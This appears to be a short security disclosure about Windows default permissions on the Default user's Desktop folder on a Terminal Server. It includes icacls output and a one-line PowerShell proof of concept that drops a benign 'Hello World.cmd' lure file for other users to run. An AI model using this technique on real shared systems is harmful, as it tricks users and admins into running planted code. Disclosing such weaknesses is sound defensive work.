Why is it by default possible for Standard Users to plant files on other users (and admins!) desktops thatlog on for the first time !?
C:\Windows\system32>icacls c:\Users\Default\Desktop
c:\Users\Default\Desktop BUILTIN\Administrators:(OI)(CI)(F)
NT AUTHORITY\SYSTEM:(OI)(CI)(F)
NT AUTHORITY\SYSTEM:(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(OI)(CI)(RX)
BUILTIN\Users:(CI)(AD)
BUILTIN\Users:(CI)(WD)
Successfully processed 1 files; Failed processing 0 files
Powershell PoC:
'@ECHO Evil code ran and you were owned !!! & pause' | Out-File -LiteralPath "$([System.Environment]::GetFolderPath([System.Environment+SpecialFolder]::CommonDesktopDirectory))\Hello World.cmd" -Encoding asciiTested with a fully patched Windows Server 2016 1607 Terminal Server